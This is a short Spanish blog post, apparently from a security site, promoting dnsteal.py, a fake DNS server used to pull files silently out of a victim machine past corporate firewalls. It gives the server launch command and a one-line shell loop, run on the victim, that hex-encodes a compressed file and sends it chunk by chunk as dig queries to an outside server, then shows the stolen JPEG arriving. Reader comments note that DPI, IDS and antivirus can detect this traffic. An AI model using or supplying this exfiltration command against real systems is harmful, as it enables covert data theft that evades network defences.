dnsteal.py, envía ficheros a través de peticiones DNS

¿Quieres sacar ficheros de un servidor de la forma más silenciosa posible? dnsteal.py es un script en Python que monta un servidor DNS falso y al cual podremos enviar ficheros sólo mediante peticiones DNS, algo también muy útil en entornos empresariales donde los firewalls permiten las peticiones DNS hacia Internet.

Su uso es muy sencillo. Levantamos el servidor en nuestro extremo:

python dnsteal.py 127.0.0.1 -z

Con la opción menos -z habilitamos la descompresión automática, ya que es conveniente mandar los ficheros comprimidos para mejorar la velocidad.



Ahora desde el servidor de la víctima simplemente ejecutamos:

for b in $(gzip -c foto.jpeg | xxd -p); do dig @server $b.filename.com; done


Y en un rato ya tenemos en nuestro servidor el fichero:

root@kali:~/pruebas/dnsteal# ls
dnsteal.py  LICENSE  README.md  recieved_filename

root@kali:~/pruebas/dnsteal# file recieved_filename 
recieved_filename: JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, frames 3
 
Fuente: https://github.com/m57/dnsteal

Comentarios

  1. Bueno recalcar que el uso de Firewalls que hagan un poco de Deep Packet Inspection, así como sistemas IDS/IPS, e incluso ya muchos productos de AV, son capaces de detectar este tipo de tráfico.
    Gracias como siempre y un saludo!

    ResponderEliminar
    Respuestas
    1. Totalmente cierto. Buen apunte. Gracias y buen fin de semana!

      Eliminar
  2. [img=http://k30.kn3.net/3/C/B/F/8/C/E15.png]

    esto es lo que me sucede e mi conexion, pero en mi caso encontre otro modem recibiendo paquetes del mi moden, el zonealarm, me bloquea a menudo mucho arp y ping, pero lo curioso es encontrar otro modem recibiendo paquetes antes que lleguen a mi, la mayoria sin exito, algunas veces si , pero la mayoria no, que piensas de esto, esto me sucede desde que la compania de internet me me da el modem, desde el primer dia.

    ResponderEliminar

Publicar un comentario